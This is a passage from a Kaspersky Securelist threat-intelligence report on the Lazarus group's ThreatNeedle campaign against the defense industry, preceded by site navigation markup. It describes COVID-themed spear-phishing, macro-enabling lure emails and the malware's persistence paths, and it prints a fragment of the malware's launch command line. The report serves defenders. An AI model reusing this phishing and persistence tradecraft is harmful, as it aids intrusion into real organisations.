class="surtitle">Kaspersky</span>Managed Detection and Response</a><div class="desc"><p><a 
href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-hunting menu-item menu-item-type-custom menu-item-object-custom menu-item-87747"><figure><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-hunting.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Compromise Assessment</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-hunting menu-item menu-item-type-custom menu-item-object-custom menu-item-112333"><figure><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-hunting.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>SOC Consulting</a><div class="desc"><p><a 
href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Services</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87751"><a href="https://www.kaspersky.com/enterprise-security/professional-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Professional Services</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87752"><a href="https://www.kaspersky.com/enterprise-security/incident-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Incident Response</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87753"><a href="https://www.kaspersky.com/enterprise-security/cyber-security-training?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Cybersecurity Training</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87755"><a href="https://www.kaspersky.com/enterprise-security/services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View All</a> </ul> </ul> <li class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87756"><a href="https://www.kaspersky.com/enterprise-security/resources?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Resource Center</a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87757"><a 
href="https://www.kaspersky.com/enterprise-security/resources/case-studies?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Case Studies</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87758"><a href="https://www.kaspersky.com/enterprise-security/resources/white-papers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">White Papers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87759"><a href="https://www.kaspersky.com/enterprise-security/resources/data-sheets?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Datasheets</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87760"><a href="https://www.kaspersky.com/enterprise-security/wiki-section/home?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Technologies</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105620"><a href="https://www.kaspersky.com/MITRE?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">MITRE ATT&CK</a> </ul> <li class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87761"><a href="https://www.kaspersky.com/about?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">About Us</a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105621"><a href="https://www.kaspersky.com/about/transparency?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" 
data-element-id="nextgen-menu-link">Transparency</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105622"><a href="https://www.kaspersky.com/about/press-releases?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Corporate News</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105623"><a href="https://press.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Press Center</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105624"><a href="https://www.kaspersky.com/about/careers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Careers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105626"><a href="https://www.kaspersky.com/about/sponsorships/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Sponsorship</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105627"><a href="https://www.kaspersky.com/about/policy-blog?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Policy Blog</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105628"><a href="https://www.kaspersky.com/about/contact?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Contacts</a> </ul> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87762"><a href="https://www.kaspersky.com/gdpr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" 
data-element-id="nextgen-menu-link">GDPR</a> </ul> </nav> </div> </header> <div class="mobile-menu-wrapper mobile-menu-wrapper--dark"> <ul class="mobile-nav" data-back="Back"> <li class="selector"> <a data-element-id="subscribe-button" href="#modal-newsletter" class="button-link js-modal-open"><i class="font-icons icon-envelope"></i>Subscribe</a> <a href="#" class="button-link c-theme-switcher js-theme-switcher"><i class="font-icons icon-moon"></i> Dark mode<span class="u-hidden u-inline--dark"> off</span></a> <a data-element-id="login-button" href="#" class="button-link js-kaspersky-sso-login"><svg class="o-icon o-svg-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-user"></use></svg>Login</a> </li> <li class="title"> <span>Securelist menu</span> </li> <li class="parent" data-parent data-icon="top-item"><a data-element-id="lang-selector" href="#" class=""><i class="top-item"></i><span>English</span></a><ul class="submenu"><li class="menu-item"><a href="https://securelist.ru/lazarus-threatneedle/100591/">Russian</a></li><li class="menu-item"><a href="https://securelist.lat">Spanish</a></li></ul> <li class="parent" data-parent="Existing Customers" data-icon="font-icons top-item"><a rel="Existing Customers" href="#"><i class="font-icons top-item"></i><span>Existing Customers</span></a> <ul class="submenu"> <li class="parent" data-parent="Personal" data-icon="top-item"><a rel="Personal" href="#"><i class="top-item"></i><span>Personal</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87860"><a href="https://my.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">My Kaspersky</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105987"><a 
href="https://www.kaspersky.com/renewal-center/home?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Renew your product</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105988"><a href="https://www.kaspersky.com/downloads?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Update your product</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105989"><a href="https://support.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Customer support</a> </ul> <li class="parent" data-parent="Business" data-icon="top-item"><a rel="Business" href="#"><i class="top-item"></i><span>Business</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105991"><a href="https://ksos.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">KSOS portal</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105992"><a href="https://cloud.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Kaspersky Business Hub</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105993"><a href="https://support.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Technical Support</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105994"><a href="https://www.kaspersky.com/small-to-medium-business-security/resources?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Knowledge Base</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105995"><a 
href="https://www.kaspersky.com/renewal-center/vsb?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Renew License</a> </ul> </ul> <li class="parent" data-parent="Home" data-icon="font-icons top-item"><a rel="Home" href="#"><i class="font-icons top-item"></i><span>Home</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87778"><a href="https://www.kaspersky.com/home-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Products</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87771"><a href="https://www.kaspersky.com/downloads?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Trials&Update</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87859"><a href="https://www.kaspersky.com/resource-center?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Resource Center</a> </ul> <li class="parent" data-parent="Business" data-icon="top-item"><a rel="Business" href="#"><i class="top-item"></i><span>Business</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112353"><a href="https://www.kaspersky.com/next?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Kaspersky Next</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87776"><a href="https://www.kaspersky.com/small-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Small Business (1-50 employees)</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87782"><a 
<section class="c-block c-block--spacing-t@md c-block--spacing-b-small@md c-block--divider-internal" style="z-index:10"> <div class="o-container-fluid"> <article class="c-article"> <header class="c-article__header"> <figure class="c-article__figure
u-hidden@md"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/18094233/abstract_cyberspace_global_data-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" fetchpriority="high" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/18094233/abstract_cyberspace_global_data-800x450.jpg" data-srcset="" srcset="" /> </figure> <p class="c-article__headline u-hidden@md"> <a href="https://securelist.com/category/apt-reports/" class="c-tag c-tag--primary">APT reports</a> </p> <h1 class="c-article__title">Lazarus targets defense industry with ThreatNeedle</h1> <div class="c-article__info"> <p class="c-article__headline u-hidden u-block@md"> <a href="https://securelist.com/category/apt-reports/" class="c-tag c-tag--primary">APT reports</a> </p> <p class="u-uppercase"><time datetime="2021-02-25T10:00:53+00:00">25 Feb 2021</time></p> <p class="c-article__reading u-ml-auto@md"> <svg class="o-icon o-svg-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-hourglass"></use></svg> <span class="js-reading-time"></span> minute read </p> </div> </header> <div class="c-article__wrapper"> <div class="c-article__main"> <div class="c-highlight c-highlight--overflow-down@md js-accordion u-hidden@md"> <div class="c-accordion-toggle js-accordion-toggle"> <div class="c-highlight__header"> <div class="c-highlight__icon"> <div class="u-block--theme-light u-hidden--theme-dark"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories.svg" /> </div> <div class="u-block--theme-dark u-hidden--theme-light"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories--invert.svg" /> </div> </div> <div class="c-highlight__title"> <p>Table of Contents</p> 
</div> </div> </div> <div class="js-accordion-container"> <div class="c-highlight__body"> <ul class='c-list-links'><li><a href="#initial-infection">Initial infection</a></li><li><a href="#malware-implants">Malware implants</a></li><ul class='c-list-links'><li><a href="#threatneedle-installer">ThreatNeedle installer</a></li><li><a href="#threatneedle-loader">ThreatNeedle loader</a></li><li><a href="#threatneedle-backdoor">ThreatNeedle backdoor</a></li></ul><li><a href="#post-exploitation-phase">Post-exploitation phase</a></li><ul class='c-list-links'><li><a href="#credential-gathering">Credential gathering</a></li><li><a href="#lateral-movement">Lateral movement</a></li><li><a href="#overcoming-network-segmentation">Overcoming network segmentation</a></li><li><a href="#exfiltration">Exfiltration</a></li></ul><li><a href="#attribution">Attribution</a></li><ul class='c-list-links'><li><a href="#connection-with-deathnote-cluster">Connection with DeathNote cluster</a></li><li><a href="#connection-with-operation-applejeus">Connection with Operation AppleJeus</a></li><li><a href="#connection-with-bookcode-cluster">Connection with Bookcode cluster</a></li></ul><li><a href="#conclusions">Conclusions</a></li><li><a href="#appendix-i-indicators-of-compromise">Appendix I – Indicators of Compromise</a></li><li><a href="#appendix-ii-mitre-attck-mapping">Appendix II – MITRE ATT&CK Mapping</a></li></ul> </div> </div> </div> <div class="o-row c-article__container"> <div class="o-col c-article__content js-article-body"> <div class="js-reading-wrapper"> <figure class="c-article__figure u-hidden u-block@md"> <img width="1200" height="600" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/18094233/abstract_cyberspace_global_data-1200x600.jpg" class="attachment-securelist-2020-thumbnail-large size-securelist-2020-thumbnail-large wp-post-image" alt="" decoding="async" loading="lazy" 
data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/12/18094233/abstract_cyberspace_global_data-1200x600.jpg" data-srcset="" srcset="" /> </figure> <div class="c-article__authors u-hidden u-block@md"> <p class="c-block__title">Authors</p> <ul class="c-list-authors"> <li> <a href="https://securelist.com/author/vyacheslavkopeytsev/" > <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/avatar-default/avatar_default_3.png"> <span>Vyacheslav Kopeytsev</span></a> </li> <li> <a href="https://securelist.com/author/seongsupark/" > <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/avatar-default/avatar_default_2.png"> <span>Seongsu Park</span></a> </li> </ul> </div> <div class="js-reading-content"> <div class="c-wysiwyg"> <p><a href="https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Lazarus-targets-defense-industry-with-Threatneedle-En.pdf" rel="noopener" target="_blank">Lazarus targets defense industry with ThreatNeedle (PDF)</a></p> <p>We named Lazarus the most active group of 2020. We’ve observed numerous activities by this notorious APT group targeting various industries. The group has changed targets depending on its primary objective. Google TAG <a href="https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/">has recently published a post</a> about a campaign by Lazarus targeting security researchers. After taking a closer look, we identified the malware used in those attacks as belonging to a family that we call ThreatNeedle. We have seen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). 
While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group’s other campaigns.</p> <p>The group made use of COVID-19 themes in its spear-phishing emails, embellishing them with personal information gathered from publicly available sources. After gaining an initial foothold, the attackers gathered credentials and moved laterally, seeking crucial assets in the victim environment. We observed how they overcame network segmentation by gaining access to an internal router machine and configuring it as a proxy server, allowing them to exfiltrate stolen data from the intranet to their remote server. So far, organizations in more than a dozen countries have been affected.</p> <input type="hidden" class="category_for_banner" data-type="posts" value="apt-inpost-banner" /> <p>During this investigation we had a chance to look into the command-and-control infrastructure. The attackers configured multiple C2 servers for various stages, reusing several scripts we’ve seen in previous attacks by the group. Moreover, the insights gathered so far made it possible to establish the relationship with other Lazarus group campaigns.</p> <p>The full article is available on <a href="https://www.kaspersky.com/enterprise-security/threat-intelligence" rel="noopener" target="_blank">Kaspersky Threat Intelligence</a>. Customers of Kaspersky Intelligence reporting may contact: <a href="mailto:intelreports@kaspersky.com" rel="noopener" target="_blank">intelreports@kaspersky.com</a><br /> For more information please contact: <a href="mailto:ics-cert@kaspersky.com" rel="noopener" target="_blank">ics-cert@kaspersky.com</a></p> <h2 id="initial-infection">Initial infection</h2> <p>In this attack, spear phishing was used as the initial infection vector. 
Before launching the attack, the group studied publicly available information about the targeted organization and identified email addresses belonging to various departments of the company.</p> <p>Email addresses in those departments received phishing emails that either had a malicious Word document attached or a link to one hosted on a remote server. The phishing emails claimed to have urgent updates on today’s hottest topic – COVID-19 infections. The phishing emails were carefully crafted and written on behalf of a medical center that is part of the organization under attack.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100809" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01.png" alt="" width="1254" height="739" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01.png 1254w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01-300x177.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01-1024x603.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01-768x453.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01-297x175.png 297w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01-370x218.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01-475x280.png 475w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144701/lazarus_threatneedle_01-800x471.png 800w" sizes="auto, (max-width: 
1254px) 100vw, 1254px" /></a></p> <p style="text-align: center"><strong><em>Phishing email with links to malicious documents</em></strong></p> <p>The attackers registered accounts with a public email service, making sure the sender’s email addresses looked similar to the medical center’s real email address. The signature shown in the phishing emails included the actual personal data of the deputy head doctor of the attacked organization’s medical center. The attackers were able to find this information on the medical center’s public website.</p> <p>A macro in the Microsoft Word document contained the malicious code designed to download and execute additional malicious software on the infected system.</p> <p>The document contains information on the population health assessment program and is not directly related to the subject of the phishing email (COVID-19), suggesting the attackers may not completely understand the meaning of the contents they used.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100810" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02.png" alt="" width="800" height="600" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02-300x225.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02-768x576.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02-200x150.png 200w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02-233x175.png 233w, 
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02-370x278.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144733/lazarus_threatneedle_02-373x280.png 373w" sizes="auto, (max-width: 800px) 100vw, 800px" /></a></p> <p style="text-align: center"><strong><em>Contents of malicious document</em></strong></p> <p>The content of the lure document was copied from an online post by a health clinic.</p> <p>Our investigation showed that the initial spear-phishing attempt was unsuccessful due to macros being disabled in the Microsoft Office installation of the targeted systems. In order to persuade the target to allow the malicious macro, the attacker sent another email showing how to enable macros in Microsoft Office.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100811" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03.png" alt="" width="1245" height="718" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03.png 1245w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03-300x173.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03-1024x591.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03-768x443.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03-303x175.png 303w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03-370x213.png 370w, 
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03-486x280.png 486w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144834/lazarus_threatneedle_03-800x461.png 800w" sizes="auto, (max-width: 1245px) 100vw, 1245px" /></a></p> <p style="text-align: center"><strong><em>Email with instructions on enabling macros #1</em></strong></p> <p>After sending the above email with explanations, the attackers realized that the target was using a different version of Microsoft Office and therefore required a different procedure for enabling macros. The attackers subsequently sent another email showing the correct procedure in a screenshot with a Russian language pack.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100812" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04.png" alt="" width="858" height="656" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04.png 858w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04-300x229.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04-768x587.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04-229x175.png 229w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04-370x283.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04-366x280.png 366w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144921/lazarus_threatneedle_04-800x612.png 
800w" sizes="auto, (max-width: 858px) 100vw, 858px" /></a></p> <p style="text-align: center"><strong><em>Email with instructions on enabling macros #2</em></strong></p> <p>The content in the spear-phishing emails sent by the attackers from May 21 to May 26, 2020, did not contain any grammatical mistakes. However, in subsequent emails the attackers made numerous errors, suggesting they may not be native Russian speakers and were using translation tools.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144956/lazarus_threatneedle_05.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100813" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144956/lazarus_threatneedle_05.png" alt="" width="697" height="352" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144956/lazarus_threatneedle_05.png 697w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144956/lazarus_threatneedle_05-300x152.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144956/lazarus_threatneedle_05-347x175.png 347w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144956/lazarus_threatneedle_05-370x187.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18144956/lazarus_threatneedle_05-554x280.png 554w" sizes="auto, (max-width: 697px) 100vw, 697px" /></a></p> <p style="text-align: center"><strong><em>Email containing several grammatical mistakes</em></strong></p> <p>On June 3, 2020, one of the malicious attachments was opened by employees, and at 9:30 am local time the attackers gained remote control of the infected system.</p> <p>This group also utilized different types of spear-phishing attacks. One of the compromised hosts received several spear-phishing documents on May 19, 2020. 
The malicious file that was delivered, named Boeing_AERO_GS.docx, fetches a template from a remote server.</p> <p>However, no payload created by this malicious document could be discovered. We speculate that the infection from this malicious document failed for a reason unknown to us. A few days later, the same host opened a different malicious document. The threat actor wiped these files from disk after the initial infection meaning they could not be obtained.</p> <p>Nonetheless, a related malicious document with this malware was retrieved based on our telemetry. It creates a payload and shortcut file and then continues executing the payload by using the following command line parameters.</p> <ul> <li>Payload path: %APPDATA%\Microsoft\Windows\lconcaches.db</li> <li>Shortcut path: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneDrives.lnk</li> <li>Command Line; please note that the string at the end is hard-coded, but different for each sample:</li> <li>exe [dllpath],Dispatch n2UmQ9McxUds2b29</li> </ul> <p>The content of the decoy document depicts the job description of a generator/power industry engineer.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-100814" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06.png" alt="" width="1239" height="725" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06.png 1239w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06-300x176.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06-1024x599.png 1024w, 
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06-768x449.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06-299x175.png 299w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06-370x217.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06-479x280.png 479w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145045/lazarus_threatneedle_06-800x468.png 800w" sizes="auto, (max-width: 1239px) 100vw, 1239px" /></a></p> <p style="text-align: center"><strong><em>Decoy document</em></strong></p> <h2 id="malware-implants">Malware implants</h2> <p>Upon opening a malicious document and allowing the macro, the malware is dropped and proceeds to a multistage deployment procedure. The malware used in this campaign belongs to a known malware cluster we named ThreatNeedle. We attribute this malware family to the advanced version of Manuscrypt (a.k.a. NukeSped), a family belonging to the Lazarus group. We previously observed the Lazarus group utilizing this cluster when attacking cryptocurrency businesses and a mobile game company. 
